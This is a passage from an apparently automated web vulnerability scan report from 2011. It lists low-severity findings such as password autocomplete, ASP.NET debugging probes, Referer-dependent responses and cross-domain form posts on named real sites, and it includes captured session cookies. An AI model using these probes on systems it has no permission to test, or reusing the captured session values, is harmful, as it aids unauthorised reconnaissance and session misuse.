Cookie: __utmz=82268809.1305158784.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=82268809.597827469.1305158784.1305158784.1305158784.1; nanpaid=nf1vNL0Qhz7LjnCZwmBG3dy5hQCtnCVwhWVvQJJzxxb4hJgtm3h2!1521367000; BIGipServernas-ns=2869930176.20480.0000

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:16:47 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 7600

<html>
<head>
<LINK REL="stylesheet" href="/nas/public/css/neustar.css">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META NAME="EXPIRES" CONTENT="0">
<META NAME="CONTRIBUTORS"
...[SNIP]...
<hr>

<form name="loginForm" method="post" action="/nas/security/logon.do?function=signon" onsubmit="return validate();">

...[SNIP]...
<td width="65%" valign="middle" align="left">
<input type="password" name="password" maxlength="30" size="20" value="">
</td>
...[SNIP]...

14.21. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.resourcenter.net
Path:	/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

Issue detail

The page contains a form with the following action URL:

https://www.nanpa.org/members.php

The form contains the following password field with autocomplete enabled:

text2

Request

Response

14.22. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.resourcenter.net
Path:	/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

Issue detail

The page contains a form with the following action URL:

https://www.nanpa.org/members.php

The form contains the following password field with autocomplete enabled:

text2

Request

Response

14.23. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.resourcenter.net
Path:	/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

Issue detail

The page contains a form with the following action URL:

https://www.nanpa.org/members.php

The form contains the following password field with autocomplete enabled:

text2

Request

Response

14.24. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.resourcenter.net
Path:	/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

Issue detail

The page contains a form with the following action URL:

https://www.nanpa.org/members.php

The form contains the following password field with autocomplete enabled:

text2

Request

Response

14.25. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.resourcenter.net
Path:	/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

Issue detail

The page contains a form with the following action URL:

https://www.nanpa.org/members.php

The form contains the following password field with autocomplete enabled:

text2

Request

Response

14.26. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.resourcenter.net
Path:	/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

Issue detail

The page contains a form with the following action URL:

https://www.nanpa.org/members.php

The form contains the following password field with autocomplete enabled:

text2

Request

Response

14.27. http://www.secviz.org/node/89 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.secviz.org
Path:	/node/89

Issue detail

The page contains a form with the following action URL:

http://www.secviz.org/content/the-davix-live-cd?destination=node%2F89

The form contains the following password field with autocomplete enabled:

pass

Request

Response

15. ASP.NET debugging enabled previous next
There are 4 instances of this issue:

http://gvnwlnp.com/Default.aspx
https://gvnwlnp.com/Default.aspx
http://www.etalkup.com/Default.aspx
http://www.redskye911.com/Default.aspx

Issue background

ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.

If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targetted attacks against the system.

Issue remediation

To disable debugging, open the Web.config file for the application, and find the <compilation> element within the <system.web> section. Set the debug attribute to "false". Note that it is also possible to enable debugging for all applications within the Machine.config file. You should confirm that debug attribute in the <compilation> element has not been set to "true" within the Machine.config file also.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.

15.1. http://gvnwlnp.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://gvnwlnp.com
Path:	/Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: gvnwlnp.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Thu, 12 May 2011 00:44:31 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Basic realm="gvnwlnp.com"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

15.2. https://gvnwlnp.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://gvnwlnp.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: gvnwlnp.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Thu, 12 May 2011 00:50:11 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Basic realm="gvnwlnp.com"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

15.3. http://www.etalkup.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.etalkup.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.etalkup.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Thu, 12 May 2011 01:06:36 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

15.4. http://www.redskye911.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.redskye911.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.redskye911.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Thu, 12 May 2011 01:06:40 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Basic realm="www.redskye911.com"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16. Referer-dependent response previous next
There are 3 instances of this issue:

http://twitter.com/statuses/user_timeline/secviz.json
http://www.facebook.com/plugins/like.php
http://www.stumbleupon.com/hostedbadge.php

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

16.1. http://twitter.com/statuses/user_timeline/secviz.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://twitter.com
Path:	/statuses/user_timeline/secviz.json

Request 1

Response 1

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:49:03 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305161343-28574-3094
X-RateLimit-Limit: 150
ETag: "9c18d6e3de016bac59085e3c74723530"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Thu, 12 May 2011 00:49:03 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.04405
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef11477ab40b6
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 48c6b00eb172eca08292fefc3f9a44aa803a0bea
X-RateLimit-Reset: 1305164927
Set-Cookie: k=173.193.214.243.1305161343071359; path=/; expires=Thu, 19-May-11 00:49:03 GMT; domain=.twitter.com
Set-Cookie: original_referer=ZLhHHTiegr8kpyX5k%2BwrH7KWx%2F5%2BVN6GIeAi2OckkTU%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCMagreEvAToHaWQiJTFlNzc0MGNjZDE5YWRh%250ANmViZDk3ZWZmMTgxMzUwYjRiIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--9e2ecb2bd74b01132ec8ea6647ea1b3428d0ca0f; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Length: 6953

twitterCallback2([{"text":"RT @pcapr Visualizing application flows: http:\/\/bit.ly\/kSappw","coordinates":null,"truncated":false,"id_str":"64004740723392512","source":"\u003Ca href=\"http:\/\/seesmic.com\/seesmic_desktop\/sd2\" rel=\"nofollow\"\u003ESeesmic Desktop\u003C\/a\u003E","geo":null,"favorited":false,"retweet_count":0,"in_reply_to_screen_name":null,"in_reply_to_status_id":null,"in_reply_to_status_id_str":null,"place":null,"created_at":"Fri Apr 29 16:34:53 +0000 2011","contributors":null,"user":{"profile_use_background_image":true,"statuses_count":229,"following":null,"profile_background_color":"9AE4E8","description":"This is a place to share, discuss, challenge, and learn about security visualization.","screen_name":"secviz","default_profile_image":false,"profile_background_image_url":"http:\/\/a1.twimg.com\/profile_background_images\/3257193\/logo.png","verified":false,"friends_count":241,"id_str":"16990708","profile_text_color":"333333","location":"","follow_request_sent":null,"profile_sidebar_fill_color":"DDFFCC","is_translator":false,"default_profile":false,"profile_background_tile":false,"url":"http:\/\/secviz.org","lang":"en","followers_count":595,"protected":false,"notifications":null,"time_zone":"Pacific Time (US & Canada)","created_at":"Mon Oct 27 02:08:14 +0000 2008","profile_link_color":"0084B4","name":"SecViz","show_all_inline_media":false,"listed_count":82,"contributors_
...[SNIP]...

Request 2

GET /statuses/user_timeline/secviz.json?callback=twitterCallback2&count=5 HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130340348934320043; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); js=1; __utma=43838368.551233229.1303561994.1304617828.1304721594.4

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:49:10 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305161350-10080-54358
X-RateLimit-Limit: 150
ETag: "9c18d6e3de016bac59085e3c74723530"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Thu, 12 May 2011 00:49:10 GMT
X-RateLimit-Remaining: 129
X-Runtime: 0.01342
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef11477ab40b6
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: db4f6e0fed08d24a6d74c64bfbf06a2810e5acc0
X-RateLimit-Reset: 1305164927
Set-Cookie: k=173.193.214.243.1305161350025304; path=/; expires=Thu, 19-May-11 00:49:10 GMT; domain=.twitter.com
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCI67reEvAToHaWQiJWI0MGUyNjQwZTEwOTFh%250ANzExYmZlYWZjNzIwOTBiNDU2IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--d3651f4a554063478772f4d2e0326f845fcfac72; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Length: 6953

twitterCallback2([{"text":"RT @pcapr Visualizing application flows: http:\/\/bit.ly\/kSappw","coordinates":null,"truncated":false,"id_str":"64004740723392512","source":"\u003Ca href=\"http:\/\/seesmic.com\/seesmic_desktop\/sd2\" rel=\"nofollow\"\u003ESeesmic Desktop\u003C\/a\u003E","geo":null,"favorited":false,"retweet_count":0,"in_reply_to_screen_name":null,"in_reply_to_status_id":null,"in_reply_to_status_id_str":null,"place":null,"created_at":"Fri Apr 29 16:34:53 +0000 2011","contributors":null,"user":{"profile_use_background_image":true,"statuses_count":229,"following":null,"profile_background_color":"9AE4E8","description":"This is a place to share, discuss, challenge, and learn about security visualization.","screen_name":"secviz","default_profile_image":false,"profile_background_image_url":"http:\/\/a1.twimg.com\/profile_background_images\/3257193\/logo.png","verified":false,"friends_count":241,"id_str":"16990708","profile_text_color":"333333","location":"","follow_request_sent":null,"profile_sidebar_fill_color":"DDFFCC","is_translator":false,"default_profile":false,"profile_background_tile":false,"url":"http:\/\/secviz.org","lang":"en","followers_count":595,"protected":false,"notifications":null,"time_zone":"Pacific Time (US & Canada)","created_at":"Mon Oct 27 02:08:14 +0000 2008","profile_link_color":"0084B4","name":"SecViz","show_all_inline_media":false,"listed_count":82,"contributors_enabled":false,"geo_enabled":false,"profile_sidebar_border_color":"BDDCAD","id":16990708,"u
...[SNIP]...

16.2. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/like.php

Request 1

GET /plugins/like.php?href=http%3A%2F%2Fwww.job-search-engine.com%2F&layout=standard&show_faces=false&width=315&action=like&font=verdana&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.job-search-engine.com/keyword/number-portability/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.18.37
X-Cnection: close
Date: Thu, 12 May 2011 00:46:02 GMT
Content-Length: 7533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dcb2dca5addf7404454917" class="connect_widget" style="font-family: "verdana", sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Juju | Job Search Engine</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 689 others like this.</span><span class="connect_widget_not_connected_text">689 likes. <a href="/campaign/landing.php?campaign_id=137675572948107&partner_id=job-search-engine.com&placement=like_button&extra_1=http%3A%2F%2Fwww.job-search-engine.com%2Fkeyword%2Fnumber-portability%2F&extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlike_span hidden_elem"><a class="connect_
...[SNIP]...

Request 2

GET /plugins/like.php?href=http%3A%2F%2Fwww.job-search-engine.com%2F&layout=standard&show_faces=false&width=315&action=like&font=verdana&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.130.55
X-Cnection: close
Date: Thu, 12 May 2011 00:46:14 GMT
Content-Length: 7363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dcb2dd65f0b65615158696" class="connect_widget" style="font-family: "verdana", sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Juju | Job Search Engine</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 689 others like this.</span><span class="connect_widget_not_connected_text">689 likes. <a href="/campaign/landing.php?campaign_id=137675572948107&partner_id&placement=like_button&extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem"> · <a c
...[SNIP]...

16.3. http://www.stumbleupon.com/hostedbadge.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.stumbleupon.com
Path:	/hostedbadge.php

Request 1

GET /hostedbadge.php?s=1 HTTP/1.1
Host: www.stumbleupon.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmf_i=4978204034dc82e628d10f2.45366819; cmf_spr=A%2FN; cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2F; su_conf=33e75ff09dd601bbe69f351039152189; __utmz=189632489.1304964711.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); su_visitorid=129409943%7Cebdeb97cb1676374c151b3c1687a96f6; su_c=28a75dd4ade42afdef0de3985f50ca5c%7C%7C50%7C%7C1304964706%7C3659c970b128684d688c3ff44795c841; __utma=189632489.1867389869.1304964711.1304967080.1304972266.3; __utmv=189632489.|1=user_class=v=1,

Response 1

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Keep-Alive: timeout=30, max=100
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 12 May 2011 00:46:53 GMT
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 431

   function writeSuBadge () {
       var bdg = "<iframe src=\"http:\/\/www.stumbleupon.com\/badge\/embed\/1\/?url=http%3A%2F%2Fconnectedplanetonline.com%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2F\" scrolling=\"no\" frameborder=\"0\" style=\"border:none; overflow:hidden; width:74px; height: 18px;\" allowTransparency=\"true\"><\/iframe>";
       document.write(bdg);
   }
   writeSuBadge();

Request 2

GET /hostedbadge.php?s=1 HTTP/1.1
Host: www.stumbleupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmf_i=4978204034dc82e628d10f2.45366819; cmf_spr=A%2FN; cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2F; su_conf=33e75ff09dd601bbe69f351039152189; __utmz=189632489.1304964711.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); su_visitorid=129409943%7Cebdeb97cb1676374c151b3c1687a96f6; su_c=28a75dd4ade42afdef0de3985f50ca5c%7C%7C50%7C%7C1304964706%7C3659c970b128684d688c3ff44795c841; __utma=189632489.1867389869.1304964711.1304967080.1304972266.3; __utmv=189632489.|1=user_class=v=1,

Response 2

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Keep-Alive: timeout=30, max=100
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 12 May 2011 00:47:34 GMT
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 295

   function writeSuBadge () {
       var bdg = "<iframe src=\"http:\/\/www.stumbleupon.com\/badge\/embed\/1\/?url=\" scrolling=\"no\" frameborder=\"0\" style=\"border:none; overflow:hidden; width:74px; height: 18px;\" allowTransparency=\"true\"><\/iframe>";
       document.write(bdg);
   }
   writeSuBadge();

17. Cross-domain POST previous next
There are 8 instances of this issue:

http://www.anpisolutions.com/wholesale-voice-and-data-services/signaling-network-and-database-services/gateway-services/
http://www.onwav.com/lnp
http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html
http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html
http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html
http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html
http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html
http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

17.1. http://www.anpisolutions.com/wholesale-voice-and-data-services/signaling-network-and-database-services/gateway-services/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.anpisolutions.com
Path:	/wholesale-voice-and-data-services/signaling-network-and-database-services/gateway-services/

Issue detail

The page contains a form which POSTs data to the domain anpisolutions.web4.hubspot.com. The form contains the following fields:

FormSubmitRedirectURL
Lead_Src
LeadGen_ContactForm_26732_m0submitter_user_token
ContactFormId
LeadGen_ContactForm_26732_m0spam_check_key
LeadGen_ContactForm_26732_m0spam_check_sig
LeadGen_ContactForm_26732_m0:FirstName
LeadGen_ContactForm_26732_m0:LastName
LeadGen_ContactForm_26732_m0:JobTitle
LeadGen_ContactForm_26732_m0:Company
LeadGen_ContactForm_26732_m0:Email
LeadGen_ContactForm_26732_m0:Phone
LeadGen_ContactForm_26732_m0:Field_Checkboxes_8
LeadGen_ContactForm_26732_m0:Field_Checkboxes_8
LeadGen_ContactForm_26732_m0:Field_Checkboxes_9
LeadGen_ContactForm_Submit_LeadGen_ContactForm_26732_m0

Request

GET /wholesale-voice-and-data-services/signaling-network-and-database-services/gateway-services/ HTTP/1.1
Host: www.anpisolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:05 GMT
Server: Apache
Vary: Accept-Encoding,Cookie
Accept-Ranges: bytes
X-Pingback: http://www.anpisolutions.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Content-Type: text/html; charset=UTF-8
Content-Length: 23377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
<img width="197" height="47" border="0" alt="Learn how to save 25% or more on your SS7 costs" src="/wp-content/uploads/SS7Inquiry.jpg" />
<form action="http://anpisolutions.web4.hubspot.com/Default.aspx?app=iframeform&hidemenu=true&ContactFormID=26732" method="post">
<input type="hidden" name="FormSubmitRedirectURL" id="FormSubmitRedirectURL" value="http://www.anpisolutions.com/thank-you-for-your-interest-in-signaling-network-and-database-services" >
...[SNIP]...

17.2. http://www.onwav.com/lnp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.onwav.com
Path:	/lnp

Issue detail

The page contains a form which POSTs data to the domain paytrace.com. The form contains the following fields:

MID
ID
PID
cmdPayTraceCart

Request

GET /lnp HTTP/1.1
Host: www.onwav.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Set-Cookie: dancer.session=893606761925970901924588756288095317; path=/; HttpOnly
X-Powered-By: Perl Dancer 1.3011
Date: Thu, 12 May 2011 00:48:31 GMT
Connection: keep-alive
Content-Length: 3893

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
